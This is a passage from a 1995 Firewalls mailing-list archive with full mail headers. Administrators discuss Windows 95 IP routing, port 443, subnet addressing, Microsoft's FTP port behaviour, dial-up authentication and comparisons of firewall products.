08:13:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA06762 for firewalls-outgoing; Thu, 12 Oct 1995 08:09:46 -0700 Received: from funet.fi (funet.fi [130.230.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA06753 for ; Thu, 12 Oct 1995 08:09:43 -0700 Received: from relevantum.fi (actually user nobody@relevantum.fi) by funet.fi with SMTP (PP); Thu, 12 Oct 1995 17:07:44 +0200 Received: by relevantum.fi (4.1/SMI-4.1-MHS-7.0) id AA10492; Thu, 12 Oct 95 17:07:39 +0200 Date: Thu, 12 Oct 1995 17:07:35 +0200 (EET) From: Keinanen Vesa To: Brian Murrell Cc: Tim Keanini , Firewalls@GreatCircle.COM Subject: Re: 'route' and WIN95 In-Reply-To: <199510120703.AAA03109@mocha.bctel.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I tried to browse through Win95 Resource Kit to find out if Win95 does IP routing. Most TCP/IP sections didn't tell anything about routing. One section about dial-up networking said that Win95 acting as Dial-Up server cannot do IP routing. Anyhow, that didn't convince me, because I knew that already TCP/IP-32 for Win3.11 had IP routing. Finally I found following: >From Microsoft Win95 resource kit: TCP/IP Registry Entries in the MSTCP Subkey Hkey_Local_Machine\System\CurrentControlSet\Services\Vxd\MSTCP EnableRouting = 0 or 1 Specifies whether to enable static routing. Microsoft TCP/IP does not supply a routing protocol, so all route table entries must be entered using the route command. The default is 0. You can manipulate Registry Entries with "regedit" tool. It took me 30 seconds to turn that parameter on. Unfortunately I cannot verify if it actully did anything, because my machine has just 1 ethernet interface. If any of you have Win95 machine w. 2 interfaces, please try this out and tell us what happens. To summarize this up * It seems that Win95 may do IP routing * By default routing is turned off * You cannot turn it on by accident * Win95 doesn't send RIP broadcasts to advertize itself, so other routers don't automatically learn routes through that host. (But we have IP Source Route to get over that routing problem) VK -- Vesa Keinanen Nasilinnankatu 24 D, 33210 Tampere, Finland Relevantum Oy Phone +358 31 2147200, Fax +358 31 2147402 From firewalls-owner Thu Oct 12 08:45:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA07264 for firewalls-outgoing; Thu, 12 Oct 1995 08:38:43 -0700 Received: from herne.newsedge.com (herne.newsedge.com [192.206.85.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA07257 for ; Thu, 12 Oct 1995 08:38:40 -0700 Date: Thu, 12 Oct 95 11:36:45 EST Message-Id: <9510121136.AA16720@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Re: Port question X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 11 Oct 1995, Chris Brenton wrote: > Does anyone know what port 443 is used for? Check out: > > http://necxdirect.necx.com Thanks to all who helped me out on this one. Port 443 appears to be used by Netscape Commerce Server for secure (?? :) transactions. I opened this port up to outgoing traffic and life is again good. From firewalls-owner Thu Oct 12 08:46:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA06869 for firewalls-outgoing; Thu, 12 Oct 1995 08:17:41 -0700 Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA06861 for ; Thu, 12 Oct 1995 08:17:36 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA02496; Thu, 12 Oct 95 11:18:48 EDT Date: Thu, 12 Oct 1995 11:18:48 -0400 (EDT) From: Scott Barman To: Ken Hardy Cc: firewalls@greatcircle.com Subject: Re: NT FTP weirdness In-Reply-To: <199510121359.AA23074@ignatz.bridge.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 12 Oct 1995, Ken Hardy wrote: > > >FTP.microsoft.com initiates all data port connections from random, > ... > >Since ftp.microsoft.com's FTP-data connections weren't coming from port > >20, they weren't allowed in. > > Fine, let M$ redefine the standards, as is their wont, until nobody can > connect to them. Maybe if we all ignore them, they'll just go away. Or let them use a better OS (see my .sig below)! scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "I don't know if security explains why the Win95 support Web servers run BSDI 2.0--an Intel-based Unix--rather than Windows NT, which Microsoft insists is the ideal Web software solution. Does Redmond know something we don't know?" -Robert X. Cringely, INFORWORLD, 9/11/95 From firewalls-owner Thu Oct 12 08:47:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA06714 for firewalls-outgoing; Thu, 12 Oct 1995 08:03:25 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA06707 for ; Thu, 12 Oct 1995 08:03:20 -0700 Received: from dtw-9.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) for id LAA03156; Thu, 12 Oct 1995 11:08:18 -0700 Date: Thu, 12 Oct 1995 11:08:18 -0700 Message-Id: <199510121808.LAA03156@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: janken@rust.net (Kenneth J. Stephens) Subject: Firewall Market Survey (Sort of) V3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To view the Computer Security Institute (CSI)1995 INTERNET Security survey information aim your browser at http://www.rust.net/~janken/milconsu.html and click on the CSI Survey button. Please address any questions about the survey information to CSI who is solely responsible for the contents. Please note that this information is in two 170k-byte JPEG files that will take a little time to load into your browser. My thanks to the RUSTnet and GreatCircle folks for their support. Ken PS: I do not represent CSI in any way, shape or form. This Information is presented without any validation of its accuracy. Bring your own grain of salt. [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Thu Oct 12 08:48:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA06743 for firewalls-outgoing; Thu, 12 Oct 1995 08:07:22 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA06736 for ; Thu, 12 Oct 1995 08:07:19 -0700 Received: (hcb@localhost) by clark.net (8.6.12/8.6.5) id LAA00133; Thu, 12 Oct 1995 11:05:08 -0400 From: Howard Berkowitz Message-Id: <199510121505.LAA00133@clark.net> Subject: Re: First and last subnet ??? To: yg@muturl.planet-int.net (Yannick Gravel) Date: Thu, 12 Oct 1995 11:05:03 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Yannick Gravel" at Oct 11, 95 10:46:39 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Content-Length: 1907 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Hi Net&Sys Security poeples, > > Something that everybody is talking about, but not everybody > is saying the same thing about subnetting: > > Yes, everybody agree that we lose the first and last host of > each subnet for net.iding and broadcasting. > > But, some are saying that I can use all subnet; but others are > saying that we lose the first and last subnet... > > Whom truth is true.. > > Thanks.. > > Yannick Gravel > System administrator -- yannick.gravel@planet-int.net > This is a FAQ about a confusing subject. The IP RFC states that the all ones and all zeroes subnets are illegal. I recommend not using them. They will work in some circumstances, but can cause obscure problems later. A pair of simple examples: 172.31.0.0 172.31.0.0 One is subnet zero of network 172.31.0.0, the other is the whole network. Which is which? 172.31.255.255 172.31.255.255 One is the broadcast for the whole network; the other is the broadcast for subnet 255. Again, which is which? You may say that's its easy enough to figure this out if you know the subnet mask. "Classful" routing protocols such as RIP and IGRP, however, don't transmit the mask in routing updates. If the receiving host or router doesn't have another way to learn the mask, it can't interpret the address and is likely to have a problem with the all zeroes and all ones subnets. Classless routing protocols such as OSPF, EIGRP, and Integrated IS-IS do send mask information, so in principle they can support the all zeroes and all ones subnets. Problems can occur, however, if they have to export such an address into a classful routing environment. Some routers will let you configure these subnets, others will never allow it. Cisco lets you do it only if you explicitly configure it; it will give you a %bad mask diagnostic if not. Howard From firewalls-owner Thu Oct 12 09:08:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA07555 for firewalls-outgoing; Thu, 12 Oct 1995 08:51:10 -0700 Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA07548 for ; Thu, 12 Oct 1995 08:51:06 -0700 Received: from anton.the-wire.com (anton.the-wire.com [198.53.192.186]) by psyche.the-wire.com (8.6.10/8.6.9) with SMTP id JAA08319; Thu, 12 Oct 1995 09:36:41 -0400 Date: Thu, 12 Oct 1995 09:36:41 -0400 From: Anton Aylward Message-Id: <199510121336.JAA08319@psyche.the-wire.com> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Thu Oct 12 09:20:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA07463 for firewalls-outgoing; Thu, 12 Oct 1995 08:48:16 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA07455 for ; Thu, 12 Oct 1995 08:48:12 -0700 Date: Thu, 12 Oct 1995 15:48:31 GMT From: bret@real.com (Bret McDanel) Received: by real.com (8.6.12/3.2.012693-Realistic Technologies Inc); id PAA23189 for firewalls@greatcircle.com; Thu, 12 Oct 1995 15:48:31 GMT Message-Id: <199510121548.PAA23189@real.com> To: firewalls@greatcircle.com Subject: Re: Port question X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Does anyone know what port 443 is used for? Check out: > > http://necxdirect.necx.com > > Your passed to port 8002 and then 443. Does anyone see any problems with opening > up port 443 access to the net? > > Thanks for any help! > > That seems to be a cgi script.. (I have a program that will snag the html, and I noticed that if I connect to port 8002 without first connecting to port 80 (standard httpd) it would give nothing) According to RFC 1700 "Assigned Numbers" https 443/tcp https MCom https 443/udp https MCom Its my guess that 443 is supposed to be used there.. look at the html, it says: Location: https://necxdirect.necx.com/docroot/index.html Just a guess.. :) From firewalls-owner Thu Oct 12 10:05:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA07772 for firewalls-outgoing; Thu, 12 Oct 1995 08:57:54 -0700 Received: from filoli.filoli.com (filoli.com [204.162.0.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA07765 for ; Thu, 12 Oct 1995 08:57:50 -0700 Received: from sunspot.filoli.com (root@sunspot.filoli.com [204.162.1.17]) by filoli.filoli.com (8.6.10/8.6.9) with ESMTP id IAA06085; Thu, 12 Oct 1995 08:55:27 -0700 Received: from glacius.filoli.com (glacius.filoli.com [204.162.1.179]) by sunspot.filoli.com (8.6.10/8.6.9) with SMTP id IAA13724; Thu, 12 Oct 1995 08:55:26 -0700 Message-Id: <199510121555.IAA13724@sunspot.filoli.com> Received: by glacius.filoli.com (NX5.67e/NX3.0X) id AA06481; Thu, 12 Oct 95 08:55:26 -0700 Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3risc v118.3) Received: by NeXT.Mailer (1.118.3) From: Daniel Curry Date: Thu, 12 Oct 95 08:55:25 -0700 To: Keinanen Vesa Subject: Re: 'route' and WIN95 Cc: Brian Murrell , Tim Keanini , Firewalls@GreatCircle.COM Reply-To: daniel_curry@filoli.com References: Organization: Filoli Information Systems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone found out if WIN95 supports "inetd" via a PPP assigned hosts connection? Thank you, -Dan Begin forwarded message: Date: Thu, 12 Oct 1995 17:07:35 +0200 (EET) From: Keinanen Vesa To: Brian Murrell Cc: Tim Keanini , Firewalls@GreatCircle.COM Subject: Re: 'route' and WIN95 In-Reply-To: <199510120703.AAA03109@mocha.bctel.net> Sender: firewalls-owner@GreatCircle.COM I tried to browse through Win95 Resource Kit to find out if Win95 does IP routing. Most TCP/IP sections didn't tell anything about routing. One section about dial-up networking said that Win95 acting as Dial-Up server cannot do IP routing. Anyhow, that didn't convince me, because I knew that already TCP/IP-32 for Win3.11 had IP routing. Finally I found following: >From Microsoft Win95 resource kit: TCP/IP Registry Entries in the MSTCP Subkey Hkey_Local_Machine\System\CurrentControlSet\Services\Vxd\MSTCP From firewalls-owner Thu Oct 12 10:15:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA09136 for firewalls-outgoing; Thu, 12 Oct 1995 09:38:01 -0700 Received: from merit.edu (merit.edu [35.1.1.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA09129 for ; Thu, 12 Oct 1995 09:37:58 -0700 Received: from ohm.merit.edu (ohm.merit.edu [198.108.60.65]) by merit.edu (8.6.12/merit-2.0) with ESMTP id MAA18146; Thu, 12 Oct 1995 12:36:07 -0400 From: William Bulley Received: (web@localhost) by ohm.merit.edu (8.6.9/8.6.5) id MAA28134; Thu, 12 Oct 1995 12:45:01 -0400 Message-Id: <199510121645.MAA28134@ohm.merit.edu> Subject: Re: Dial-up access To: PESTONI@BUEVM1.VNET.IBM.COM Date: Thu, 12 Oct 1995 12:44:59 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199510112317.QAA15148@miles.greatcircle.com> from "firewalls-owner@GreatCircle.COM" at Oct 11, 95 08:11:07 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 931 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to firewalls-owner@GreatCircle.COM: > > I have a couple of questions about support for dial-up access. > Can anyone point me to information about SLIP and PPP implementing > TACACS/+ or RADIUS (unfortunately, I need to support DOS too)? > How about concentrators for asynchronous lines (aka terminal server, > aka access server) that include filtering (a la Cisco's 2511)? We have a version of Merit RADIUS (albeit a little long in the tooth now...) which runs on Novell NetWare 3.x -- would that help? A more up-to-date version (based on a recent 2.x release of Merit RADIUS) is in the works for NetWare 4.x (which I guess includes 3.x automagically) Regards, web... -- William Bulley, N8NXN Senior Systems Research Programmer Merit Network Inc. Domain: web@merit.edu 4251 Plymouth Road MaBell: (313) 764-9993 Ann Arbor, Michigan 48105-2785 Fax: (313) 747-3185 From firewalls-owner Thu Oct 12 10:43:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA10352 for firewalls-outgoing; Thu, 12 Oct 1995 10:08:04 -0700 Received: from innergate.sni.co.uk (gate.sni.co.uk [193.116.1.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA10330 for ; Thu, 12 Oct 1995 10:07:52 -0700 Received: from squidgy.sni.co.uk (squidgy.sni.co.uk [137.223.5.110]) by innergate.sni.co.uk (8.6.11/8.6.6) with SMTP id RAA16300 for ; Thu, 12 Oct 1995 17:21:18 GMT Received: by squidgy.sni.co.uk with Microsoft Mail id <307D59AC@squidgy.sni.co.uk>; Thu, 12 Oct 95 18:08:44 UTC From: Andy Dent To: firewalls Subject: Looking for CHAP Authentication on PPP Date: Thu, 12 Oct 95 18:07:00 UTC Message-ID: <307D59AC@squidgy.sni.co.uk> Encoding: 55 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi We're setting up a private network here to allow a mixture of dial-in PPP and ISDN2 users to access a single WWW Server. The server is connected to our internal network using a second NIC via a router to gain access to a number of internal databases. I THINK I have taken the correct precautions to stop unwanted people using this server as a jumping off point to our internal network but I am still missing some things. One is details on how to authenticate the PPP Dialin users. I think (unless someone can suggest a better alternative) we would like to use some form of challenge/response mechanism to validate the user - in addition I want to be able to allocate an IP address to that user by a login and password - this is so we can control what the user is allowed access to by the IP address. (The http Daemon I am using has been modified to validate Protection Rules through a database). My theory is that if they can get past an unpublished telephone number, the on-time - AND a valid user /password - it's reasonably safe to assume they really are who I think they are... I know that trumpet for example supports PAP - does any one know of a Windows product that supports CHAP? Is there a better way of doing this? Finally - I am also looking for a very basic TCP/IP package for DOS based Palmtops - These are not very powerful and will be connecting to a dedicated - stand-alone FTP server for download only. Ideally I want to use the same style of one-time challenge/response type mechanism. Though I have been listening in on firewalls for some time - I still consider myself to be a novice at these things so any help would be appreciated. Regards Andy Dent Siemens Nixdorf Information Systems Limited Siemens House Oldbury Bracknell Berks ENGLAND E-mail adent@sni.co.uk or dent.kent@sni.de From firewalls-owner Thu Oct 12 11:01:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12155 for firewalls-outgoing; Thu, 12 Oct 1995 10:52:13 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12148 for ; Thu, 12 Oct 1995 10:52:10 -0700 Received: from nahanni.BouletFermat.ab.ca by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id KAA17113; Thu, 12 Oct 1995 10:43:00 -0700 Received: (from danny@localhost) by nahanni.BouletFermat.ab.ca (8.6.9/8.6.9) id LAA03888 for firewalls@greatcircle.com; Thu, 12 Oct 1995 11:53:49 -0600 Date: Thu, 12 Oct 1995 11:53:49 -0600 From: Danny Boulet Message-Id: <199510121753.LAA03888@nahanni.BouletFermat.ab.ca> To: firewalls@greatcircle.com Subject: ipfirewall v2.0d and the GNU Public License Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have been informed that ipfirewall v2.0d may violate the GNU Public License. Until this matter is cleared up, I've ask the two ftp sites mentioned in my posting of a few days ago to remove the v2.0d version. ipfirewall v2.0c doesn't suffer from whatever problems v2.0d may suffer from. Consequently, it is still available at the following locations: ftp://ftp.nebulus.net/pub/bsdi/security/ipfirewall_v2.0c.shar.gz ftp://ftp.bsdi.com/contrib/networking/security/ipfirewall_v2.0c.shar.gz Terribly sorry if this causes any problems. Since GPL isn't exactly 'on topic' for this mailing list, please avoid any discussion of this issue on this list. -Danny From firewalls-owner Thu Oct 12 11:14:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA12136 for firewalls-outgoing; Thu, 12 Oct 1995 10:51:35 -0700 Received: from gatekeeper.ray.com (gatekeeper.ray.com [138.125.162.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12129 for ; Thu, 12 Oct 1995 10:51:32 -0700 Received: from localhost (mailer@localhost) by gatekeeper.ray.com (8.6.4/8.6.5) id NAA21715; Thu, 12 Oct 1995 13:49:35 -0400 Received: from eoits1.eo.ray.com by gatekeeper.ray.com; Thu Oct 12 13:48:17 1995 Received: by eo.ray.com (5.0/SMI-SVR4) id AA21286; Thu, 12 Oct 1995 13:48:01 -0400 Date: Thu, 12 Oct 1995 13:48:01 -0400 From: hhantman@eo.ray.com (Howard Hantman) Message-Id: <9510121748.AA21286@eo.ray.com> To: firewalls@GreatCircle.COM, ken@bridge.com Subject: Re: NT FTP weirdness Content-Length: 796 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > FTP.microsoft.com initiates all data port connections from random, ... > Since ftp.microsoft.com's FTP-data connections weren't coming from port > 20, they weren't allowed in. FTP.microsoft.com does not appear to implement other parts of the FTP standard, either. If you do not send it an explicit PORT command prior to doing a file transfer it also hangs, rather than making the connection to the same port number the control connection came from as required by the spec. I have reported the problem to them several times with no response. Howard Hantman Manager, Technology Integration Corporate ITS Raytheon Company From firewalls-owner Thu Oct 12 11:31:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA12878 for firewalls-outgoing; Thu, 12 Oct 1995 11:17:38 -0700 Received: from inc.net (beta.inc.net [204.95.160.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA12871 for ; Thu, 12 Oct 1995 11:17:34 -0700 Received: from inc.net by inc.net (4.1/SMI-4.1) id AA27609; Thu, 12 Oct 95 13:15:43 CDT Received: from ([204.154.225.101]) by thud (5.x/SMI-SVR4) id AA00611; Thu, 12 Oct 1995 13:14:34 -0500 Message-Id: <307D7741.556F@strong-funds.com> Date: Thu, 12 Oct 1995 13:14:57 -0700 From: Walt Herrmann X-Mailer: Mozilla 2.0b1 (Windows; I; 16bit) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Firewall1 Comparison X-Url: http://home.netscape.com/comprod/products/navigator/version_2.0/contest_rules.html Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are looking at purchasing the Firewall1 product. According to the Trade magazines, as a firewall it appears to be the premire product. If anyone has any additional competitive information or experiences with Firewall1, I would appreciate passing it along. Has anyone heard of V-ONE SmartWall as a firewall? Any experiences. From firewalls-owner Thu Oct 12 12:17:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA14533 for firewalls-outgoing; Thu, 12 Oct 1995 12:00:48 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA14525 for ; Thu, 12 Oct 1995 12:00:44 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id LAA08175; Thu, 12 Oct 1995 11:58:41 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma008172; Thu Oct 12 11:58:15 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id LAA05677; Thu, 12 Oct 1995 11:55:19 -0700 Date: Thu, 12 Oct 1995 11:55:19 -0700 From: Brian Murrell Message-Id: <199510121855.LAA05677@mocha.bctel.net> To: avalon@coombs.anu.edu.au, firewalls@GreatCircle.COM, gblolmxb@ibmmail.com Subject: Re: Your Message Sent on Wed, 11 Oct 1995 05:35:37 EDT Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: HUyT3gHSVE2xcuMbW+ts9w== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Darren Reed wrote about his local telco starting up a 'private' > network, in conjunction with AT&T, NTT,Unisource and Deustche > Telekom. > > This sort of network has been around for some time, IBM for example > have a global network, and it can be use for IP, IPX etc. > > I have raised the need for a firewall to filter IP traffic in the > past, but have been told that there is no need as the network is > private & secure. I dont believe this, does anyone else have any > comments? (preferably from people who know about IBM's MPN). When deciding whether to firewall or not, don't make you decision based on whether the network is the Internet or not. You should always ask yourself the question: "Do I trust the entire community I share this network with??". If the answer is no, firewall!! b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Thu Oct 12 12:48:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA15584 for firewalls-outgoing; Thu, 12 Oct 1995 12:33:57 -0700 Received: from TIS.COM (neptune.tis.com [192.94.214.96]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA15570 for ; Thu, 12 Oct 1995 12:33:53 -0700 Received: from relay.tis.com by neptune.TIS.COM id aa28891; 12 Oct 95 15:26 EDT Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.1) id xma027684; Thu, 12 Oct 95 15:08:47 -0400 Received: from gildor (gildor.tis.com) by tis.com (4.1/SUN-5.64) id AA01780; Thu, 12 Oct 95 15:25:40 EDT Message-Id: <9510121925.AA01780@tis.com> X-Sender: avolio@sol.tis.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 12 Oct 1995 15:25:48 -0400 To: Walt Herrmann , firewalls@greatcircle.com From: Frederick M Avolio Subject: Re: Firewall1 Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk SmartWall is based on the Gauntlet Internet Firewall, our product. We are a competitor of Firewall-1. The premire firewall?? I read the trade mags and don't see this indicated. Firewall-1 is a packet filter. A smart filter, but never-the-less a filter. Application gateways are more secure. Anyway, you send info to gauntlet-info@tis.com or check out our web page at www.tis.com for more info (or drop me a note). Fred At 01:14 PM 10/12/95 -0700, Walt Herrmann wrote: >We are looking at purchasing the Firewall1 product. According to >the Trade magazines, as a firewall it appears to be the premire >product. If anyone has any additional competitive information >or experiences with Firewall1, I would appreciate passing it >along. Has anyone heard of V-ONE SmartWall as a firewall? Any >experiences. > > From firewalls-owner Thu Oct 12 13:02:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA15772 for firewalls-outgoing; Thu, 12 Oct 1995 12:42:54 -0700 Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA15758 for ; Thu, 12 Oct 1995 12:42:49 -0700 Received: from crl13.crl.com by mail.crl.com with SMTP id AA27031 (5.65c/IDA-1.5 for ); Thu, 12 Oct 1995 12:40:16 -0700 Received: by crl13.crl.com id AA12108 (5.65c/IDA-1.5); Thu, 12 Oct 1995 12:26:13 -0700 Date: Thu, 12 Oct 1995 12:26:12 -0700 (PDT) From: Tim Keanini To: "A. Padgett Peterson, P.E. Information Security" Cc: firewalls@greatcircle.com Subject: Re: Microsoft FTP wierd In-Reply-To: <951011224606.2105dcc6@hobbes.orl.mmc.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 11 Oct 1995, A. Padgett Peterson, P.E. Information Security wrote: > Robert rites: > >FTP.microsoft.com initiates all data port connections from random, > >high-numbered TCP ports, instead of the RFC-mandated port 20. This apparently > >was intentional- there's a registry setting called "EnablePortAttack" that, > >when turned on, will cause the server to initiate connections from 20 again. > > Suspect this may also be fairly recent. Until about a month ago I was able > to connect to ftp.microsoft.com without problem but lately it has been > hanging. Suspect this is the problem since the firewall is set to > "paranoid". If what is happening is that the ftpd on the remote end is doing the active open on a high port back to the client, it could be that they are running mjr's aftpd. It is a beautiful thing. The idea is that because the ftpd does not have to bind to port20, then it will not have to run as root. Another beautiful thing. aftpd is wonderful and is up on ftp.tis.com. It is only for anonymous ftp sevices and is a very small piece of code to be read through in one sitting. --blast From firewalls-owner Thu Oct 12 13:44:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16345 for firewalls-outgoing; Thu, 12 Oct 1995 13:18:42 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA16330 for ; Thu, 12 Oct 1995 13:18:38 -0700 Received: from uucp4.UU.NET by relay3.UU.NET with SMTP id QQzlef03752; Thu, 12 Oct 1995 16:16:11 -0400 Received: from brite.UUCP by uucp4.UU.NET with UUCP/RMAIL ; Thu, 12 Oct 1995 16:16:42 -0400 Received: from usrpc10.wichita.brite.com by brite.wichita.brite.com (5.65/1.35) id AA17421; Thu, 12 Oct 95 15:15:52 -0500 Date: Thu, 12 Oct 95 14:52:28 CDT From: Shane Kinsch Subject: FireWall-1 from Sun version 1.2.1 To: Firewall X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Locally, were setting up a firewall using FireWall-1 from Sun version 1.2.1. I would like to know if there is any reported security problems with this kit. If your using it, how do you like it, etc... Thanks for you input. Shane _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ Shane T Kinsch BRITE VOICE SYSTEMS, INC. _/ _/ shane.kinsch@brite.com UNIX SYSTEM ADMINISTRATOR _/ _/ Wichita, KS USA VP UNIX ENGINEERING _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Thu Oct 12 15:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18335 for firewalls-outgoing; Thu, 12 Oct 1995 14:47:06 -0700 Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA18328 for ; Thu, 12 Oct 1995 14:47:03 -0700 Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA25357; Thu, 12 Oct 1995 16:44:58 -0500 Date: Thu, 12 Oct 1995 16:44:58 -0500 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9510122144.AA25357@hosaka.smallworks.com> To: avolio@TIS.COM, firewalls@GreatCircle.COM, wherrman@strong-funds.com Subject: Re: Firewall1 Comparison Sender: 